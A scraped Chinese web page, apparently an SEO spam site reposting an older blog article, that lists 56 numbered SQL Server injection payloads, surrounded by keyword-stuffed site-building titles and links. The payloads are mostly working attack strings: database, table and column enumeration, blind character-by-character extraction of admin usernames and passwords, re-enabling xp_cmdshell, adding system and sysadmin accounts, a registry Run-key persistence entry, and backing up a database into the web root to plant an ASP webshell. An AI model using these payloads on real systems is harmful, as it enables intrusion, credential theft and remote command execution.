当前位置: 首页 > news >正文

石家庄高端网站制作联盟网站建设

石家庄高端网站制作,联盟网站建设,佛山网站建设优化,西安学校网站制作1、返回的是连接的数据库名and db_name()02、作用是获取连接用户名and user03、将数据库备份到Web目录下面;backup database 数据库名 to diskc:\inetpub\wwwroot\1.db;--4、显示SQL系统版本and 1(select VERSION) 或and 1convert(int,version)--5、判断xp_cmdshell扩展…  1、返回的是连接的数据库名and db_name()02、作用是获取连接用户名and user03、将数据库备份到Web目录下面;backup database 数据库名 to diskc:\inetpub\wwwroot\1.db;--4、显示SQL系统版本and 1(select VERSION) 或and 1convert(int,version)--5、判断xp_cmdshell扩展存储过程是否存在and 1(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype X AND name xp_cmdshell)6、恢复xp_cmdshell扩展存储的命令;exec master.dbo.sp_addextendedproc xp_cmdshell,e:\inetput\web\xplog70.dll;--7、向启动组中写入命令行和执行程序;EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,help1,REG_SZ,cmd.exe /c net user test ptlove /add8、查看当前的数据库名称and 0 db_name(n) n改成0,1,2,3……就可以跨库了 或and 1convert(int,db_name())--9、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令同第7610、则把得到的数据内容全部备份到WEB目录下;backup database 数据库名 to diskc:\inetpub\wwwroot\save.db11、通过复制CMD创建UNICODE漏洞;exec master.dbo.xp_cmdshell copy c:\winnt\system32\cmd.exe   c:\inetpub\scripts\cmd.exe12、遍历系统的目录结构分析结果并发现WEB虚拟目录先创建一个临时表temp ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--(1)利用xp_availablemedia来获得当前所有驱动器,并存入temp表中    ;insert temp exec master.dbo.xp_availablemedia;--通过查询temp的内容来获得驱动器列表及相关信息(2)利用xp_subdirs获得子目录列表,并存入temp表中                    ;insert into temp(id) exec master.dbo.xp_subdirs c:\;--(3)还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 实验成功13、查看某个文件的内容可以通过执行xp_cmdsell;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;--14、将一个文本文件插入到一个临时表中;bulk insert temp(id) from c:\inetpub\wwwroot\index.asp15、每完成一项浏览后应删除TEMP中的所有内容删除方法是;delete from temp;--16、浏览TEMP表的方法是and (select top 1 id from TestDB.dbo.temp)0 假设TestDB是当前连接的数据库名17、猜解所有数据库名称and (select count(*) from master.dbo.sysdatabases where name1 and dbid6) 0   dbid6,7,8分别得到其它库名18、猜解数据库中用户名表的名称and (select count(*) from TestDB.dbo.表名)0 若表名存在则abc.asp工作正常否则异常。如此循环直到猜到系统帐号表的名称。19、判断是否是sysadmin权限and 1(SELECT IS_SRVROLEMEMBER(sysadmin))20、判断是否是SA用户sa(SELECT System_user)21、查看数据库角色;use model--22、查看库名and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid6)--23、获得第一个用户建立表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtypeU and status0 )0   假设要获得数据库是TestDB.dbo24、获得第二个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtypeU and status0 and name not in(xyz))025、获得第三个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtypeU and status0 and name not in(xyz,))0   中为第二个用户名26、获得第四个用户建立的表的名称and (select top 1 name from TestDB.dbo.sysobjects where xtypeU and status0 and name not in(xyz,,))0   ,中为第二,三个用户名27、获得表中记录的条数and (select count(*) from 表名5 记录条数小于5   或   10 记录条数小于10   ……等等28、测试权限结构mssqland 1(SELECT IS_SRVROLEMEMBER(sysadmin));--and 1(SELECT IS_SRVROLEMEMBER(serveradmin));--and 1(SELECT IS_SRVROLEMEMBER(setupadmin));--and 1(SELECT IS_SRVROLEMEMBER(securityadmin));--and 1(SELECT IS_SRVROLEMEMBER(diskadmin));--and 1(SELECT IS_SRVROLEMEMBER(bulkadmin));--and 1(SELECT IS_MEMBER(db_owner));--29、 添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--;exec master.dbo.xp_cmdshell net user username password /add;--;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--30、 简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values (%server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);backup database model to diskg:\wwwtest\l.asp;请求的时候像这样子用http://ip/l.asp?cdir31、猜解字段名称猜解法and (select count(字段名) from 表名)0   若“字段名”存在则返回正常读取法and (select top 1 col_name(object_id(表名),1) from sysobjects)0   把col_name(object_id(表名),1)中的1依次换成2,3,4,56…就可得到所有的字段名称。32、 猜解用户名与密码ASCII码逐字解码法:基本的思路是先猜出字段的长度然后依次猜出每一位的值and (select top 1 len(username) from admin)X(X1,23,45… n假设username为用户名字段的名称admin为表的名称   若x为某一值i且abc.asp运行正常时则i就是第一个用户名的长度。and (select top 1 ascii(substring(username,m,1)) from admin)n   (m的值在上一步得到的用户名长度之间当m12,3…时猜测分别猜测第1,2,3,…位的值n的值是1~9、a~z、A~Z的ASCII值也就是1~128之间的任意值admin为系统用户帐号表的名称)33、建立数据表;create table 表名 (列名1 数据类型,列名2 数据类型);--34、向表格中插入数据;insert into 表名 (列名1,列名2…… values (值1,值2……);--35、更新记录update 表名 set 列名1值…… where ……36、删除记录delete from 表名 where ……37、删除数据库表格drop table 表名38、将文本文件导入表使用bulk insert语法可以将一个文本文件插入到一个临时表中。简单地创建这个表create table foo( line varchar(8000))然后执行bulk insert操作把文件中的数据插入到表中如bulk insert foo from c:\inetpub\wwwroot\process_login.asp39、备份当前数据库的命令declare a sysname;set adb_name();backup database a to disk你的IP你的共享目录bak.dat ,nametest;--40、使用sp_makewebtask处理过程的相关请求写入URL; EXEC master..sp_makewebtask \\10.10.1.3\share\output.html, SELECT * FROM INFORMATION_SCHEMA.TABLES41、将获得SQLSERVER进程的当前工作目录中的目录列表Exec master..xp_cmdshell dir42、将提供服务器上所有用户的列表Exec master..xp_cmdshell net user43、读注册表存储过程exec xp_regread HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\lanmanserver\parameters, nullsessionshares44、xp_servicecontrol过程允许用户启动停止暂停和继续服务exec master..xp_servicecontrol start,scheduleexec master..xp_servicecontrol start,server45、显示机器上有用的驱动器Xp_availablemedia46、允许获得一个目录树Xp_dirtree47、提供进程的进程ID终止此进程Xp_terminate_process48、恢复xp_cmdshellExec master.dbo.addextendedproc xp_cmdshell,xplog70.dll49、堵上cmdshell的SQL语句sp_dropextendedproc xp_cmdshell50、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效declare shell int exec sp_oacreate wscript.shell,shell output exec sp_oamethod shell,run,null,c:\winnt\system32\cmd.exe /c net user gchn aaa /add--51、在数据库内添加一个hax用户;exec sp_addlogin hax;--52、给hax设置密码;exec master.dbo.sp_password null,username,password;--53、将hax添加到sysadmin组;exec master.dbo.sp_addsrvrolemember sysadmin hax;--54、(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree c:\;and (select top 1 paths from dirs)0;and (select top 1 paths from dirs where paths not in(上步得到的paths)))55、(2)遍历目录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看文件的内容56、mssql中的存储过程xp_regenumvalues 注册表根键, 子键;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名;exec xp_regread HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion,CommonFilesDir 返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion,TestValueName,reg_sz,hello 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion,TestValueName 删除某个值xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Tes 转载于:https://www.cnblogs.com/lijinchang/archive/2010/11/26/1888697.html
http://www.huolong8.cn/news/431477/

相关文章:

  • 深圳网站设计比较好的公司有哪些社区cms
  • 怎么用ftpxp做网站南宁网站制作设计
  • 医疗不可以做网站wordpress 用户评分
  • 普通人找工作哪个网站好广西网站建设seo优化
  • 推荐六款适合做小说阅读站及小说下载站的wordpress 模板如何免费做一个网页
  • 中国电力建设集团网站网站建设培训证书
  • 床上用品网站源码青岛网站设计工作室
  • 深圳网站建设公司多少钱网站开发模式
  • 企业自助建站系统源码wordpress自动压缩图片大小
  • 医疗器械网站前置审批360搜索网站提交
  • wed网站百度竞价可以自学吗
  • 重庆网站制作的网站淘宝网站建设可行性分析报告
  • 镇江网站建设推广学校门户网站的网站建设方案
  • 网站竞价建一个网站迈年
  • 服装公司网站策划书网站编辑转行做文案
  • 欧亚达网站是哪家公司做的app下载网站建设
  • 长景园林这个网站谁做的软件设计开发
  • 永康网站优化公司昆明做百度网站电话号码
  • 杭州建设企业网站的2023年楼市将迎来抛售潮
  • 忘记网站后台admin密码自助建网站不需要域名
  • 网站学什么版面设计的概念
  • iis7搭建网站织梦软件开发文档的需求分析
  • 网站建设实训报告册微信分销app
  • 滁州网站建设哪个好点成都住建局官网平台登录
  • 怎么制作钓鱼网站建一个购物网站多少钱
  • 哪个网站教做pptwordpress 酒店中文主题
  • 百度收录网站提交入口做网站学什么语言
  • 建站公司 网络服务电商商城网站开发
  • 做医疗信息网站的域名网站做生鲜线下推广建议
  • 一站传媒seo优化在百度上怎么做网站